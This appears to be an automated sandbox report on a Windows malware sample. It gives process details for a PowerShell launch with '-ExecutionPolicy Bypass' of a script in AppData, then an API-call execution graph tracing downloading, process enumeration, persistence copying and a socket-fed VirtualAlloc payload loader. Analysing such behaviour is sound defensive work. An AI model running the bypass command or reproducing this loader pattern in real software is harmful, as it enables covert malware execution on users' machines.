                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:16.9%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:3.6%
                                                                                                  Total number of Nodes:1397
                                                                                                  Total number of Limit Nodes:7
                                                                                                  execution_graph 10366 100018d0 10367 100018f1 6 API calls 10366->10367 10368 100018e2 10366->10368 10375 10002b60 10367->10375 10369 100019c2 PostQuitMessage 10368->10369 10370 100018ec DefWindowProcW 10368->10370 10374 100019e5 10369->10374 10370->10374 10373 100019a2 CreateThread 10373->10374 10377 100019f0 10373->10377 10376 10002b6f Concurrency::task_continuation_context::task_continuation_context 10375->10376 10376->10373 10380 10002090 10377->10380 10379 10001a13 10429 10017290 10380->10429 10383 10002143 SendMessageW 10384 1000215a InternetReadFile 10383->10384 10385 1000223c 8 API calls 10384->10385 10389 1000217c 10384->10389 10431 10001d60 VariantInit 10385->10431 10387 10002186 fwrite 10387->10389 10388 100022cd 10432 10001d60 VariantInit 10388->10432 10389->10384 10389->10385 10389->10387 10391 10002226 SendMessageW 10389->10391 10391->10389 10392 100023ce 10433 10001d60 VariantInit 10392->10433 10394 100024cc 10434 10001d60 VariantInit 10394->10434 10396 100025ca 10435 10001d80 VariantClear 10396->10435 10398 10002776 10436 10001d80 VariantClear 10398->10436 10400 10002785 10437 10001d80 VariantClear 10400->10437 10402 10002794 10438 10001d80 VariantClear 10402->10438 10404 100027a6 10439 10001a20 10404->10439 10406 100027cc 10444 10001b40 10406->10444 10409 10002926 exit 10409->10379 10412 10002915 Sleep 10412->10409 10413 1000284d 10452 10001e30 10413->10452 10415 1000285b 10416 10002913 10415->10416 10417 1000287a Sleep 10415->10417 10416->10409 10421 10002867 10417->10421 10421->10415 10421->10416 10422 100028cf 10421->10422 10458 10002da0 10421->10458 10462 10001fa0 CreateToolhelp32Snapshot 10421->10462 10473 10002cb0 10421->10473 10476 100029f0 10422->10476 10428 1000290b 10428->10416 10430 100020c6 InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 10429->10430 10430->10383 10430->10384 10431->10388 10432->10392 10433->10394 10434->10396 10435->10398 10436->10400 10437->10402 10438->10404 10489 10001350 10439->10489 10443 10001a64 _com_issue_error 10443->10406 10530 10001b90 10444->10530 10447 10001da0 10547 10001ab0 10447->10547 10449 10001dd9 10450 10001b40 SysFreeString 10449->10450 10451 10001e15 10450->10451 10451->10412 10451->10413 10453 10001ab0 5 API calls 10452->10453 10454 10001e69 10453->10454 10455 10001b40 SysFreeString 10454->10455 10456 10001ea5 VariantInit 10455->10456 10457 10001ef2 10456->10457 10457->10415 10459 10002dd1 HandleT _Error_objects 10458->10459 10554 10003ee0 10459->10554 10461 10002dfa 10461->10421 10463 10001fc3 memset Process32FirstW 10462->10463 10464 10001fbc 10462->10464 10465 10002074 CloseHandle 10463->10465 10466 10001ff8 WideCharToMultiByte 10463->10466 10464->10421 10465->10464 10467 10002da0 8 API calls 10466->10467 10470 1000202b 10467->10470 10469 10002cb0 _invalid_parameter_noinfo_noreturn 10469->10470 10470->10469 10471 10002051 CloseHandle 10470->10471 10472 1000205f Process32NextW 10470->10472 10596 10003bf0 10470->10596 10471->10464 10472->10465 10472->10466 10608 10003230 10473->10608 10475 10002cbf 10475->10421 10477 10002a21 HandleT _Error_objects 10476->10477 10626 10003c80 10477->10626 10479 100028df 10480 10001f10 10479->10480 10481 10001f38 10480->10481 10485 10001f31 10480->10485 10482 10001ab0 5 API calls 10481->10482 10483 10001f54 10482->10483 10484 10001b40 SysFreeString 10483->10484 10484->10485 10486 10002960 10485->10486 10655 10002fb0 10486->10655 10488 1000296f 10488->10428 10495 10015fe6 10489->10495 10492 10001bc0 10503 10016ea0 10492->10503 10494 10001be4 10494->10443 10496 10015ff8 malloc 10495->10496 10497 1000135c 10496->10497 10498 10015feb _callnewh 10496->10498 10497->10443 10497->10492 10498->10496 10501 10016007 allocator 10498->10501 10499 10016704 stdext::threads::lock_error::lock_error 10500 10016712 _CxxThrowException 10499->10500 10501->10499 10502 100166f5 _CxxThrowException 10501->10502 10502->10499 10504 10016f00 10503->10504 10505 10016edd 10503->10505 10508 10016fd3 _com_issue_error 10504->10508 10509 10016f1f MultiByteToWideChar 10504->10509 10522 10016d47 10505->10522 10507 10016efa 10507->10494 10510 10016fe7 GetLastError 10508->10510 10509->10510 10511 10016f3c 10509->10511 10515 10016ff1 _com_issue_error 10510->10515 10512 10016f64 malloc 10511->10512 10513 10016f4e 10511->10513 10512->10513 10513->10508 10514 10016f9a MultiByteToWideChar 10513->10514 10514->10515 10516 10016fae SysAllocString 10514->10516 10517 10017010 GetLastError 10515->10517 10518 10017007 free 10515->10518 10519 10016fc8 10516->10519 10520 10016fbf free 10516->10520 10521 1001701a _com_issue_error 10517->10521 10518->10517 10519->10505 10519->10508 10520->10519 10521->10494 10523 10016d50 IsProcessorFeaturePresent 10522->10523 10524 10016d4f 10522->10524 10526 10016d92 10523->10526 10524->10507 10529 10016d55 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10526->10529 10528 10016e75 10528->10507 10529->10528 10531 10001b9f 10530->10531 10533 10001b4f 10530->10533 10534 10001c50 10531->10534 10533->10409 10533->10447 10535 10001c6c 10534->10535 10536 10001c82 10534->10536 10535->10536 10538 10001ca0 10535->10538 10536->10533 10541 10001ce0 10538->10541 10540 10001caf _MallocaArrayHolder 10540->10536 10544 10001d00 10541->10544 10543 10001cef 10543->10540 10545 10001d11 SysFreeString 10544->10545 10546 10001d26 _MallocaArrayHolder 10544->10546 10545->10546 10546->10543 10548 10001350 allocator 4 API calls 10547->10548 10549 10001ad5 10548->10549 10551 10001af4 _com_issue_error 10549->10551 10552 10001c00 SysAllocString 10549->10552 10551->10449 10553 10001c32 _com_issue_error 10552->10553 10553->10551 10555 10003ef7 Concurrency::task_continuation_context::task_continuation_context 10554->10555 10557 10003f01 Concurrency::task_continuation_context::task_continuation_context 10555->10557 10565 10001410 ?_Xlength_error@std@@YAXPBD 10555->10565 10558 10003f77 Concurrency::task_continuation_context::task_continuation_context 10557->10558 10559 10003f2b 10557->10559 10567 100048e0 10558->10567 10566 100036d0 memcpy 10559->10566 10562 10003f9e HandleT Concurrency::task_continuation_context::task_continuation_context 10570 100036d0 memcpy 10562->10570 10564 10003f4f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 10564->10461 10565->10557 10566->10564 10571 10004a70 10567->10571 10570->10564 10574 10004ac0 10571->10574 10575 10004ad0 allocator 10574->10575 10578 10004af0 10575->10578 10579 10004905 10578->10579 10580 10004afd 10578->10580 10579->10562 10581 10004b14 10580->10581 10582 10004b06 10580->10582 10584 10001350 allocator 4 API calls 10581->10584 10585 10004b70 10582->10585 10584->10579 10586 10004b87 10585->10586 10587 10004b8c 10585->10587 10593 100012c0 10586->10593 10589 10001350 allocator 4 API calls 10587->10589 10591 10004b96 10589->10591 10590 10004ba4 _invalid_parameter_noinfo_noreturn 10590->10590 10590->10591 10591->10590 10592 10004bb3 10591->10592 10592->10579 10594 10001240 stdext::threads::lock_error::lock_error 10593->10594 10595 100012ce _CxxThrowException 10594->10595 10595->10587 10599 100045f0 10596->10599 10600 1000460a Concurrency::task_continuation_context::task_continuation_context 10599->10600 10603 10004940 10600->10603 10604 10004950 10603->10604 10606 10003bff 10603->10606 10604->10606 10607 100049e0 memcmp 10604->10607 10606->10470 10607->10606 10609 10003247 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10608->10609 10611 10003278 Concurrency::task_continuation_context::task_continuation_context 10609->10611 10612 10003910 10609->10612 10611->10475 10615 10003a90 10612->10615 10618 10004340 10615->10618 10617 1000393b 10617->10611 10619 10004361 10618->10619 10621 1000436e _MallocaArrayHolder 10618->10621 10622 10001370 10619->10622 10621->10617 10623 100013ae 10622->10623 10624 100013bc _invalid_parameter_noinfo_noreturn 10623->10624 10625 100013cb 10623->10625 10624->10623 10624->10624 10625->10621 10627 10003c97 10626->10627 10629 10003ca1 Concurrency::task_continuation_context::task_continuation_context 10627->10629 10637 10001410 ?_Xlength_error@std@@YAXPBD 10627->10637 10630 10003ccb 10629->10630 10633 10003d1c 10629->10633 10638 10003770 memcpy 10630->10638 10632 10003cef HandleT _Error_objects 10632->10479 10639 10004820 10633->10639 10635 10003d43 HandleT Concurrency::task_continuation_context::task_continuation_context 10642 10003770 memcpy 10635->10642 10637->10629 10638->10632 10643 10004a50 10639->10643 10642->10632 10646 10004a90 10643->10646 10651 10004b30 10646->10651 10649 10004af0 allocator 6 API calls 10650 10004845 10649->10650 10650->10635 10652 10004aa0 10651->10652 10653 10004b4a 10651->10653 10652->10649 10654 100012c0 allocator _CxxThrowException 10653->10654 10654->10652 10656 10002fc7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10655->10656 10658 10002ff8 10656->10658 10659 100037c0 10656->10659 10658->10488 10662 10003a50 10659->10662 10663 10004340 allocator _invalid_parameter_noinfo_noreturn 10662->10663 10664 100037eb 10663->10664 10664->10658 10665 8d0032 10675 8d0ae4 GetPEB 10665->10675 10668 8d0ae4 GetPEB 10671 8d02a7 10668->10671 10669 8d04a6 GetNativeSystemInfo 10670 8d04d3 VirtualAlloc 10669->10670 10672 8d0a9c 10669->10672 10673 8d04ec 10670->10673 10671->10669 10671->10672 10673->10672 10677 10015df0 10673->10677 10676 8d029b 10675->10676 10676->10668 10685 10015820 10677->10685 10680 10015e20 CloseHandle exit 10683 10015e6e 10680->10683 10681 10015e37 GetCurrentThread WaitForSingleObject CreateThread 10743 10015490 WSAStartup getaddrinfo 10681->10743 11775 1000b570 10681->11775 10683->10672 10761 100054b0 SHGetFolderPathA 10685->10761 10689 10015876 10779 10015450 10689->10779 10693 100158d2 10694 10002cb0 _invalid_parameter_noinfo_noreturn 10693->10694 10695 10015973 10694->10695 10696 1001597b 10695->10696 10699 100159a2 _Smanip _Error_objects 10695->10699 10697 10002cb0 _invalid_parameter_noinfo_noreturn 10696->10697 10698 1001598a 10697->10698 10700 10002cb0 _invalid_parameter_noinfo_noreturn 10698->10700 10785 10012640 10699->10785 10701 1001599c CreateMutexA GetLastError 10700->10701 10701->10680 10701->10681 10705 10015b57 _Smanip _Error_objects 10706 10012640 9 API calls 10705->10706 10707 10015bda 10706->10707 10708 10005400 9 API calls 10707->10708 10709 10015bf1 10708->10709 10795 10013890 10709->10795 10712 10002cb0 _invalid_parameter_noinfo_noreturn 10713 10015c42 10712->10713 10798 10012620 10713->10798 10716 10002cb0 _invalid_parameter_noinfo_noreturn 10717 10015c60 10716->10717 10718 10012620 _invalid_parameter_noinfo_noreturn 10717->10718 10719 10015c6f memset 10718->10719 10720 10002b60 10719->10720 10721 10015cc0 ShellExecuteExA 10720->10721 10722 10015d13 10721->10722 10723 10015ceb 10721->10723 10726 10002cb0 _invalid_parameter_noinfo_noreturn 10722->10726 10724 10015d11 10723->10724 10725 10015cf4 WaitForSingleObject CloseHandle 10723->10725 10729 10015700 9 API calls 10724->10729 10725->10724 10727 10015d22 10726->10727 10728 10002cb0 _invalid_parameter_noinfo_noreturn 10727->10728 10730 10015d31 10728->10730 10731 10015d55 10729->10731 10732 10002cb0 _invalid_parameter_noinfo_noreturn 10730->10732 10733 10015d72 CopyFileA 10731->10733 10732->10701 10734 10002cb0 _invalid_parameter_noinfo_noreturn 10733->10734 10735 10015d84 ShellExecuteA 10734->10735 10801 10001660 GetModuleHandleA 10735->10801 10738 10002cb0 _invalid_parameter_noinfo_noreturn 10739 10015db3 10738->10739 10740 10002cb0 _invalid_parameter_noinfo_noreturn 10739->10740 10741 10015dc2 10740->10741 10742 10002cb0 _invalid_parameter_noinfo_noreturn 10741->10742 10742->10701 10744 10015509 WSACleanup exit 10743->10744 10756 10015522 10743->10756 10745 100156ed exit 10744->10745 10745->10683 10746 100155c5 freeaddrinfo 10750 100155d9 WSACleanup exit 10746->10750 10755 100155f2 10746->10755 10747 1001553d socket 10748 10015566 WSACleanup exit 10747->10748 10749 1001557f connect 10747->10749 10748->10745 10751 100155a3 closesocket 10749->10751 10752 100155be 10749->10752 10750->10745 10751->10756 10752->10746 10753 100155f9 recv 10754 10015671 10753->10754 10753->10755 10758 10015677 10754->10758 10759 1001567b closesocket WSACleanup free exit 10754->10759 10755->10753 10757 10015646 realloc 10755->10757 10760 100156b8 VirtualAlloc memcpy 10755->10760 10756->10746 10756->10747 10757->10755 10758->10760 10759->10745 10760->10745 10762 100054fa 10761->10762 10763 100054db 10761->10763 10765 10002da0 8 API calls 10762->10765 10764 10002da0 8 API calls 10763->10764 10766 100054ea 10764->10766 10765->10766 10767 10015750 GetModuleFileNameA 10766->10767 10768 10002da0 8 API calls 10767->10768 10769 10015798 10768->10769 10831 10002b10 10769->10831 10772 100157b7 10835 10002ad0 10772->10835 10773 100157e9 10777 10002cb0 _invalid_parameter_noinfo_noreturn 10773->10777 10776 10002cb0 _invalid_parameter_noinfo_noreturn 10778 100157e4 10776->10778 10777->10778 10778->10689 10862 10015400 10779->10862 10782 10015700 GetModuleFileNameA 10783 10002da0 8 API calls 10782->10783 10784 10015733 10783->10784 10784->10693 10786 10012660 HandleT 10785->10786 10867 10013cd0 10786->10867 10788 10012699 10789 10005400 10788->10789 10790 10005431 _Error_objects 10789->10790 10901 100127e0 10790->10901 10792 10005455 HandleT 10793 1000549d 10792->10793 10908 100128b0 10792->10908 10793->10705 10955 10014400 10795->10955 10797 100138b2 10797->10712 10799 100130b0 _invalid_parameter_noinfo_noreturn 10798->10799 10800 1001262f 10799->10800 10800->10716 10802 10002da0 8 API calls 10801->10802 10803 100016a3 10802->10803 10979 10001510 10803->10979 10807 100016d1 10808 10002cb0 _invalid_parameter_noinfo_noreturn 10807->10808 10809 100016dc 10808->10809 10810 10002cb0 _invalid_parameter_noinfo_noreturn 10809->10810 10811 100016ee 10810->10811 10991 10001430 10811->10991 10815 10001723 11007 10003bc0 10815->11007 10817 10001748 10818 10002cd0 _invalid_parameter_noinfo_noreturn 10817->10818 10819 1000175c 10818->10819 10820 10002cb0 _invalid_parameter_noinfo_noreturn 10819->10820 10821 10001767 10820->10821 10822 10002cb0 _invalid_parameter_noinfo_noreturn 10821->10822 10823 10001776 10822->10823 10824 10002cb0 _invalid_parameter_noinfo_noreturn 10823->10824 10825 10001788 CreateThread RegisterClassW GetSystemMetrics GetSystemMetrics 10824->10825 11010 10001580 10825->11010 11144 10005760 10825->11144 10827 1000182f CreateWindowExW ShowWindow 10828 1000188a KiUserCallbackDispatcher 10827->10828 10829 100018b5 10828->10829 10830 1000189e TranslateMessage DispatchMessageW 10828->10830 10829->10738 10830->10828 10832 10002b22 Concurrency::task_continuation_context::task_continuation_context 10831->10832 10839 10003dc0 10832->10839 10834 10002b55 10834->10772 10834->10773 10836 10002ae8 _Error_objects 10835->10836 10851 100035a0 10836->10851 10840 10003dd3 10839->10840 10844 10003e1f _Min_value 10839->10844 10840->10844 10845 10003e90 memset 10840->10845 10842 10003de8 10842->10844 10846 10004860 10842->10846 10844->10834 10845->10842 10847 100048b6 10846->10847 10848 1000486c _Min_value 10846->10848 10847->10844 10848->10847 10850 100049b0 memchr 10848->10850 10850->10848 10852 100035d5 10851->10852 10857 10003980 10852->10857 10854 100035ee Concurrency::task_continuation_context::task_continuation_context 10855 10003ee0 8 API calls 10854->10855 10856 10002afd 10855->10856 10856->10776 10858 10003992 10857->10858 10860 10003997 10857->10860 10861 10003a70 ?_Xout_of_range@std@@YAXPBD 10858->10861 10860->10854 10861->10860 10866 100153f0 10862->10866 10864 1001541d __stdio_common_vsprintf 10865 10015439 10864->10865 10865->10782 10866->10864 10868 10013cf6 Concurrency::task_continuation_context::task_continuation_context 10867->10868 10869 10013d70 _Error_objects 10868->10869 10875 10014390 10868->10875 10869->10788 10876 1001439f 10875->10876 10877 100143a9 10876->10877 10889 10013090 ?_Xlength_error@std@@YAXPBD 10876->10889 10890 10014860 10877->10890 10881 10014ec0 10882 10014ee4 HandleT 10881->10882 10894 100152a0 10882->10894 10884 10013d51 10885 10014230 10884->10885 10886 10014249 10885->10886 10887 1001423f 10885->10887 10886->10869 10897 100130b0 10887->10897 10889->10877 10891 10014893 Concurrency::task_continuation_context::task_continuation_context 10890->10891 10892 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10891->10892 10893 10013d29 10892->10893 10893->10881 10895 100152af 10894->10895 10896 100152cd memcpy 10895->10896 10896->10884 10899 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10897->10899 10898 10013139 10898->10886 10899->10898 10900 10003a90 allocator _invalid_parameter_noinfo_noreturn 10899->10900 10900->10898 10902 100127f4 10901->10902 10903 100127f6 10901->10903 10902->10792 10903->10902 10904 1001280e 10903->10904 10906 1001283c Concurrency::task_continuation_context::task_continuation_context 10903->10906 10912 10013ed0 10904->10912 10906->10902 10925 100131d0 10906->10925 10909 10012914 10908->10909 10911 100128cd Concurrency::task_continuation_context::task_continuation_context 10908->10911 10937 10013fe0 10909->10937 10911->10792 10913 10013ef0 Concurrency::task_continuation_context::task_continuation_context 10912->10913 10915 10013efd Concurrency::task_continuation_context::task_continuation_context 10913->10915 10931 10001410 ?_Xlength_error@std@@YAXPBD 10913->10931 10916 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10915->10916 10917 10013f37 HandleT _Error_objects 10916->10917 10918 10013f6c HandleT 10917->10918 10919 10013faf 10917->10919 10932 10012860 10918->10932 10920 10012860 memcpy 10919->10920 10923 10013fa2 Concurrency::task_continuation_context::task_continuation_context 10920->10923 10923->10902 10924 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10924->10923 10926 100131e7 HandleT _Error_objects 10925->10926 10936 100036d0 memcpy 10926->10936 10928 10013223 Concurrency::task_continuation_context::task_continuation_context 10929 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10928->10929 10930 10013245 10929->10930 10930->10902 10931->10915 10935 100036d0 memcpy 10932->10935 10934 1001287b 10934->10924 10935->10934 10936->10928 10938 10014000 Concurrency::task_continuation_context::task_continuation_context 10937->10938 10940 1001400d Concurrency::task_continuation_context::task_continuation_context 10938->10940 10950 10001410 ?_Xlength_error@std@@YAXPBD 10938->10950 10941 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10940->10941 10942 10014047 HandleT _Error_objects 10941->10942 10943 100140c4 10942->10943 10944 1001407c HandleT 10942->10944 10945 10012940 Concurrency::task_continuation_context::task_continuation_context memcpy 10943->10945 10951 10012940 10944->10951 10948 100140b7 Concurrency::task_continuation_context::task_continuation_context 10945->10948 10947 100140a6 10949 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10947->10949 10948->10911 10949->10948 10950->10940 10954 100036d0 memcpy 10951->10954 10953 1001295a Concurrency::task_continuation_context::task_continuation_context 10953->10947 10954->10953 10956 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 10955->10956 10957 100144c7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10956->10957 10958 10014518 Concurrency::task_continuation_context::task_continuation_context 10956->10958 10973 100036d0 memcpy 10957->10973 10960 100145d3 Concurrency::task_continuation_context::task_continuation_context 10958->10960 10962 10014568 HandleT _Error_objects 10958->10962 10965 100145ee Concurrency::task_continuation_context::task_continuation_context 10960->10965 10976 10001410 ?_Xlength_error@std@@YAXPBD 10960->10976 10974 100039e0 memcpy 10962->10974 10964 100145a9 Concurrency::task_continuation_context::task_continuation_context 10975 100036d0 memcpy 10964->10975 10966 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10965->10966 10968 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 10966->10968 10977 100036d0 memcpy 10968->10977 10970 1001467a Concurrency::task_continuation_context::task_continuation_context 10978 100036d0 memcpy 10970->10978 10972 10014507 _Error_objects 10972->10797 10973->10972 10974->10964 10975->10972 10976->10965 10977->10970 10978->10972 10980 10002b10 2 API calls 10979->10980 10981 1000152c 10980->10981 10982 10001535 10981->10982 10983 10001558 10981->10983 10984 10002ad0 9 API calls 10982->10984 11024 10002e20 10983->11024 10986 1000154a 10984->10986 10987 10002cd0 10986->10987 10988 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 10987->10988 10989 10003230 _invalid_parameter_noinfo_noreturn 10988->10989 10990 10002cea 10988->10990 10989->10990 10990->10807 11042 10002ec0 10991->11042 10993 1000146b SHGetKnownFolderPath 10994 100014e7 10993->10994 10995 1000149a wcstombs 10993->10995 11044 10002c90 10994->11044 10996 10002da0 8 API calls 10995->10996 10998 100014c2 10996->10998 11000 10002cd0 _invalid_parameter_noinfo_noreturn 10998->11000 10999 100014f4 11004 10003b90 10999->11004 11001 100014d1 11000->11001 11002 10002cb0 _invalid_parameter_noinfo_noreturn 11001->11002 11003 100014d9 CoTaskMemFree 11002->11003 11003->10999 11073 10002c20 11004->11073 11006 10003ba7 11006->10815 11105 10002c50 11007->11105 11009 10003bd7 11009->10817 11011 100015a2 11010->11011 11015 100015d9 _Error_objects 11010->11015 11117 10015f82 AcquireSRWLockExclusive 11011->11117 11013 100015ac 11013->11015 11122 1001631a 11013->11122 11109 10003ac0 11015->11109 11019 10001629 11113 10002980 11019->11113 11021 1000163a 11022 10002960 _invalid_parameter_noinfo_noreturn 11021->11022 11023 10001642 11022->11023 11023->10827 11025 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 11024->11025 11028 10004020 11025->11028 11027 10002e9e 11027->10986 11029 10004037 Concurrency::task_continuation_context::task_continuation_context 11028->11029 11031 10004041 Concurrency::task_continuation_context::task_continuation_context 11029->11031 11039 10001410 ?_Xlength_error@std@@YAXPBD 11029->11039 11032 1000406b 11031->11032 11034 1000409b Concurrency::task_continuation_context::task_continuation_context 11031->11034 11040 100036d0 memcpy 11032->11040 11035 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11034->11035 11036 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 11035->11036 11041 100036d0 memcpy 11036->11041 11038 1000408d _Error_objects 11038->11027 11039->11031 11040->11038 11041->11038 11043 10002ef1 _Error_objects 11042->11043 11043->10993 11047 100032c0 11044->11047 11048 100032d0 HandleT 11047->11048 11051 10003850 11048->11051 11050 10002ca3 11050->10999 11052 100038a8 11051->11052 11053 10003864 Concurrency::task_continuation_context::task_continuation_context 11051->11053 11058 10004270 11052->11058 11057 100039e0 memcpy 11053->11057 11056 10003889 Concurrency::task_continuation_context::task_continuation_context 11056->11050 11057->11056 11059 10004281 Concurrency::task_continuation_context::task_continuation_context 11058->11059 11061 1000428b Concurrency::task_continuation_context::task_continuation_context 11059->11061 11068 10001410 ?_Xlength_error@std@@YAXPBD 11059->11068 11062 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11061->11062 11063 100042bc HandleT _Error_objects 11062->11063 11069 100038d0 11063->11069 11065 100042f9 11066 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11065->11066 11067 10004313 Concurrency::task_continuation_context::task_continuation_context 11065->11067 11066->11067 11067->11056 11068->11061 11072 100036d0 memcpy 11069->11072 11071 100038ea Concurrency::task_continuation_context::task_continuation_context 11071->11065 11072->11071 11074 10002c30 HandleT 11073->11074 11077 100032f0 11074->11077 11076 10002c49 11076->11006 11078 1000335d 11077->11078 11080 10003310 Concurrency::task_continuation_context::task_continuation_context 11077->11080 11084 10004150 11078->11084 11083 100039e0 memcpy 11080->11083 11082 1000333b Concurrency::task_continuation_context::task_continuation_context 11082->11076 11083->11082 11085 10004170 Concurrency::task_continuation_context::task_continuation_context 11084->11085 11087 1000417d Concurrency::task_continuation_context::task_continuation_context 11085->11087 11097 10001410 ?_Xlength_error@std@@YAXPBD 11085->11097 11088 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11087->11088 11089 100041b7 HandleT _Error_objects 11088->11089 11090 10004237 11089->11090 11091 100041ec HandleT 11089->11091 11092 10003390 memcpy 11090->11092 11098 10003390 11091->11098 11096 1000422a Concurrency::task_continuation_context::task_continuation_context 11092->11096 11094 10004219 11095 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11094->11095 11095->11096 11096->11082 11097->11087 11103 100036d0 memcpy 11098->11103 11100 100033aa 11104 100036d0 memcpy 11100->11104 11102 100033c1 Concurrency::task_continuation_context::task_continuation_context 11102->11094 11103->11100 11104->11102 11106 10002c6a Concurrency::task_continuation_context::task_continuation_context 11105->11106 11107 100032f0 10 API calls 11106->11107 11108 10002c7d 11107->11108 11108->11009 11111 10003af5 HandleT 11109->11111 11110 10003b32 11110->11019 11111->11110 11126 100046f0 11111->11126 11114 10002992 HandleT Concurrency::task_continuation_context::task_continuation_context 11113->11114 11115 10002fb0 _invalid_parameter_noinfo_noreturn 11114->11115 11116 1000299a 11114->11116 11115->11116 11116->11021 11118 10015f96 11117->11118 11119 10015f9b ReleaseSRWLockExclusive 11118->11119 11139 10015fd1 SleepConditionVariableSRW 11118->11139 11119->11013 11140 100162ec 11122->11140 11125 10015f31 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 11125->11015 11127 1000471c Concurrency::task_continuation_context::task_continuation_context 11126->11127 11129 1000475c 11127->11129 11134 10001410 ?_Xlength_error@std@@YAXPBD 11127->11134 11130 10004820 6 API calls 11129->11130 11131 1000477f _Error_objects Concurrency::task_continuation_context::task_continuation_context 11129->11131 11130->11131 11135 10004990 11131->11135 11134->11129 11136 10004801 11135->11136 11137 1000499f 11135->11137 11136->11110 11138 10002fb0 _invalid_parameter_noinfo_noreturn 11137->11138 11138->11136 11139->11118 11141 10016302 _register_onexit_function 11140->11141 11142 100162fb _crt_atexit 11140->11142 11143 100015cc 11141->11143 11142->11143 11143->11125 11145 10005798 11144->11145 11146 10002da0 8 API calls 11145->11146 11147 100057ae 11146->11147 11148 10002e20 8 API calls 11147->11148 11149 100057c5 _Smanip _Error_objects 11148->11149 11150 10012640 9 API calls 11149->11150 11151 10005e28 _Smanip _Error_objects 11150->11151 11152 10012640 9 API calls 11151->11152 11153 1000a1cb 11152->11153 11154 10005400 9 API calls 11153->11154 11155 1000a1e2 11154->11155 11156 10005400 9 API calls 11155->11156 11157 1000a1fc _Error_objects 11156->11157 11424 10004fe0 11157->11424 11160 10002cd0 _invalid_parameter_noinfo_noreturn 11161 1000a253 11160->11161 11162 10002cb0 _invalid_parameter_noinfo_noreturn 11161->11162 11163 1000a25e 11162->11163 11164 10004fe0 17 API calls 11163->11164 11165 1000a272 11164->11165 11166 10002cd0 _invalid_parameter_noinfo_noreturn 11165->11166 11167 1000a28d 11166->11167 11168 10002cb0 _invalid_parameter_noinfo_noreturn 11167->11168 11169 1000a298 GetTempPathA 11168->11169 11171 10002da0 8 API calls 11169->11171 11172 1000a373 _Smanip _Error_objects 11171->11172 11173 10012640 9 API calls 11172->11173 11174 1000a3fc 11173->11174 11175 10005400 9 API calls 11174->11175 11176 1000a413 11175->11176 11177 10012620 _invalid_parameter_noinfo_noreturn 11176->11177 11178 1000a425 11177->11178 11179 10002e20 8 API calls 11178->11179 11180 1000a44b 11179->11180 11448 10005250 11180->11448 11182 1000a457 _Smanip _Error_objects 11183 10012640 9 API calls 11182->11183 11184 1000a50d 11183->11184 11185 10005400 9 API calls 11184->11185 11186 1000a524 11185->11186 11455 100138d0 11186->11455 11188 1000a557 11189 10002cb0 _invalid_parameter_noinfo_noreturn 11188->11189 11190 1000a569 11189->11190 11191 10012620 _invalid_parameter_noinfo_noreturn 11190->11191 11192 1000a578 11191->11192 11458 10005520 DeleteFileA 11192->11458 11194 1000a58a 11195 10002da0 8 API calls 11194->11195 11196 1000a5a4 11195->11196 11460 10005300 11196->11460 11199 10002cb0 _invalid_parameter_noinfo_noreturn 11200 1000a5cd Sleep 11199->11200 11201 1000a5e5 11200->11201 11202 10002da0 8 API calls 11201->11202 11203 1000a5f1 _Smanip _Error_objects 11202->11203 11204 10012640 9 API calls 11203->11204 11205 1000a666 11204->11205 11206 10005400 9 API calls 11205->11206 11207 1000a67d 11206->11207 11208 10002e20 8 API calls 11207->11208 11209 1000a6c7 11208->11209 11210 10005250 13 API calls 11209->11210 11211 1000a6d3 11210->11211 11212 10002cb0 _invalid_parameter_noinfo_noreturn 11211->11212 11213 1000a6eb 11212->11213 11214 10012620 _invalid_parameter_noinfo_noreturn 11213->11214 11215 1000a6fa 11214->11215 11216 10002cb0 _invalid_parameter_noinfo_noreturn 11215->11216 11217 1000a709 11216->11217 11218 10002da0 8 API calls 11217->11218 11219 1000a721 _Smanip _Error_objects 11218->11219 11220 10012640 9 API calls 11219->11220 11221 1000a79a 11220->11221 11222 10005400 9 API calls 11221->11222 11223 1000a7b1 11222->11223 11224 10002e20 8 API calls 11223->11224 11225 1000a7fb 11224->11225 11226 10005250 13 API calls 11225->11226 11227 1000a807 11226->11227 11228 10002cd0 _invalid_parameter_noinfo_noreturn 11227->11228 11229 1000a82e 11228->11229 11230 10002cb0 _invalid_parameter_noinfo_noreturn 11229->11230 11231 1000a839 11230->11231 11232 10002cb0 _invalid_parameter_noinfo_noreturn 11231->11232 11233 